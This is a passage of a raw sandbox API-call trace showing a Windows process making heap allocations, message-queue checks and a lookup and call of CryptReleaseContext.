RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0174.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0174.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0174.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0174.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0174.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0174.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0174.368] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0174.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0174.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0174.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0174.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0174.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0174.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0174.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0174.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0174.369] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0174.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0174.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0174.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0174.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0174.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0174.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0174.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0174.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0174.370] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0174.370] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0174.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0174.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0174.370] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0174.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0174.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0174.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0174.371] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0174.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0174.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0174.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0174.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0174.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0174.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0174.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0174.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0174.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0174.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0174.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0174.435] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0174.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0174.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0174.436] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0174.436] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0174.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0174.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0174.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0174.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0174.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0174.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0174.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0174.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0174.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0174.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0174.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0174.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0174.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0174.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0174.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0174.439] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0174.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0174.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0174.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0174.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0174.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0174.439] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0174.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0174.440] 